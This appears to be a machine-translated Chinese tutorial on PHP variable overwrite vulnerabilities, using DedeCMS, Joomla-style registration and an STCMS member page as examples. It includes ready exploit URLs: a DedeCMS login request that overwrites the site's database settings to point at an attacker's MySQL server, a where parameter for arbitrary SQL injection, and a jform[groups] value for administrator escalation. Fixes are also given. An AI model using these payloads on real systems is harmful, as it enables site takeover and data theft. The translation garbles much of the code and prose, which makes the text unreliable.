Php variable coverage

1 [B]. variable no initialization problem (1): [/B] http://www.bkjia.com/Article/201211/172403.html $ updateinfo ['Password'] = $ newpassword; the array inside does not initialize assignments like this, when digging holes, we search for keywords like updateinfo to see if they are initialized. If not... Register_global = On allows you to submit an array such as updateinfo [amount] to modify your balance, points, member groups, VIP, and other information stored in the member table at will. fixed: $ updateinfo = array (); variable no initialization Problem (2): http://www.bkjia.com/Article/201208/150678.html

This section describes the defense against bypassing the program. This is a cause of injection. More factors are caused by the where variable being not initialized! Case 'LIST': $ totalNum = $ mysql-> numTable ("member", $ where); if not initialized, arbitrary SQL statements can be executed. http://localhost/stcms_html/member/u.php?action=list&where= {SQL} fix: add $ where = ''before class calling. When digging holes, search for keywords like where to see if Initialization is successful. the variable is not initialized (3 ): http://www.bkjia.com/Article/201205/130717.html // Get the user registration information in this place. The jform array in POST is not specified, but $ requestData = JRequest: getVar ('jform', array (), 'post ', 'array'); $ data = (array) $ this-> getData (); // traverses the registration information foreach ($ temp as $ k => $ v) {$ data [$ k] = $ v;} seemingly no problem, but the two-dimensional array feature can cover: jfrom [groups] [] = 7, use foreach to overwrite the groups array and change it to 7 (Administrator ). Fixed: assign values like $ updateinfo ['Password'] = $ newpassword in connection 1. Or check whether the array is two-dimensional. 2. Variable overwrite caused by core code configuration problems: Dedecms: Example (1): 1. Understand PHP super global variables. Below is a PHP super global variable. You can understand a feature, which is an array. $ GLOBALS, all global variable arrays $ _ SERVER, SERVER environment variable arrays $ _ GET, passed to the variable array $ _ POST of the script through the GET method, the variable array $ _ COOKIE and cookie variable array $ _ REQUEST passed to the script through the POST method. All input variable arrays, including $ _ GET, $ _ POST and $ _ input content contained in cookies $ _ FILES, array of variables related to file upload $ _ ENV, array of environment variables $ _ SESSION, and array of SESSION variables 2: to understand the $ _ GET variable, you can write a PHP file to see it: <? Phpvar_dump ($ _ GET);?> Access http://www.xxx.com/test.php?key = Value to GET array (1) {["key"] => string (5) "value"} OK. As you can see, $ _ GET is an array, we can use the GET method to upload an array. Re-Access http://www.xxx.com/test.php?key [Arr1] = value to get array (1) {["key"] => array (1) {["arr1"] => string (5) "value"} we passed in a nested array through the GET method. The problem has actually come out. Many PHP security documents have not mentioned this feature of passing nested arrays through GET. Occasionally, several exploit pages show --! 3. After in-depth follow-up on the DEDECMS global variable Registration Vulnerability and truly understand the $ _ GET variable, we will follow up on the real cause of the vulnerability and simulate the entire process of the vulnerability: Submit a nested array: http://www.xxxx.com /Test. php? _ POST [GLOBALS] [pai_dbname] = X array (1) {["_ POST"] => array (1) {["GLOBALS"] => array (1) {["pai_dbname"] => string (1) "X" }}if the data is passed into the DEDECMS program, filter the data at the first layer, DEDECMS checks whether there are any global variable keywords in $ _ REQUEST, but our KEY is _ POST and an array, so it is easy to bypass. Foreach ($ _ REQUEST as $ _ k =>$ _ v) {if (strlen ($ _ k)> 0 & eregi ('^ (cfg _ | GLOBALS )', $ _ k) {exit ('request var not allow! ') ;}} Then enter the real variable registration process, which is first registered from the $ _ GET variable in order. Our KEY is (_ POST ), the first round of traversal $ _ GET successfully registers the variable $ _ POST, and the second round of traversal $ _ POST successfully registers the variable $ GLOBALS! Foreach (Array ('_ get',' _ Post', '_ COOKIE') as $ _ request) {foreach ($ _ request as $ _ k = >$ _ v) $ {$ _ k} = _ RunMagicQuotes ($ _ v );} the cause of the vulnerability is clear. The program registers $ _ POST through $ _ GET, and registers $ GLOBALS through $ _ POST! 4. After fixing a vulnerability, you will know how to fix it. 1. You can see how DISCUZ is done. If the first character of the KEY exists _, the variable is not registered. Foreach (array ('_ cookies',' _ Post', '_ get') as $ _ request) {foreach ($ _ request as $ _ key = >$ _ value) {$ _ key {0 }! = '_' & $ _ Key = daddslashes ($ _ value) ;}} 2. you can use the following method to temporarily fix DEDECMS. When you traverse $ _ POST to register a variable, it will block variable registration if the variable name exists in GLOBALS. Foreach (Array ('_ get',' _ Post', '_ COOKIE') as $ _ request) {foreach ($ _ request as $ _ k = >$ _ v) {if (strlen ($ _ k)> 0 & eregi ('^ (cfg _ | GLOBALS) ', $ _ k) {exit ('request var not allow! ') ;}$ {$ _ K }=_ RunMagicQuotes ($ _ v) ;}} example exp: http://www.xx.com/ Webdream website background/login. php? Dopost = login & validate = dcug & userid = Account & pwd = PASSWORD & _ POST [GLOBALS] [mongo_dbhost] = MYSQL external link IP & _ POST [GLOBALS] [mongo_dbuser] = MYSQL account & _ POST [GLOBALS] [mongo_dbpwd] = MYSQL password & _ POST [GLOBALS] [mongo_dbname] = dedecms database of your Dedecms: example (2): Break through the official website patch (jizhu) http://www.bkjia.com/Article/201205/129974.html Why didn't the $ _ COOKIE parameter be read from the Super global variable $ _ REQUEST? This is the default request_order = "GP" setting for php. ini after php 5.3, so you know! If you modify request_order = "GPC", $ _ REQUEST should be able to accept the parameter! So if php is more than 5.3, the variable overwrite vulnerability can be exploited again! CheckRequest ($ _ REQUEST); // check whether the variable is valid! $ _ The COOKIE parameter does not bird him at all... More connections: https://forum.90sec.org/thread-2476-1-1.html https://forum.90sec.org/thread-2468-1-1.html 3. Yaseng php variable overwrite example: Yaseng introduced in detail and made various breakthroughs: http://www.bkjia.com/Article/201212/174595.html For Dedecms Example 2: Some people say that & _ POST [0 xHEX hexadecimal] [mongo_dbhost] // GLOBALS can bypass this way? I failed the test multiple times. It may be a problem or a false one.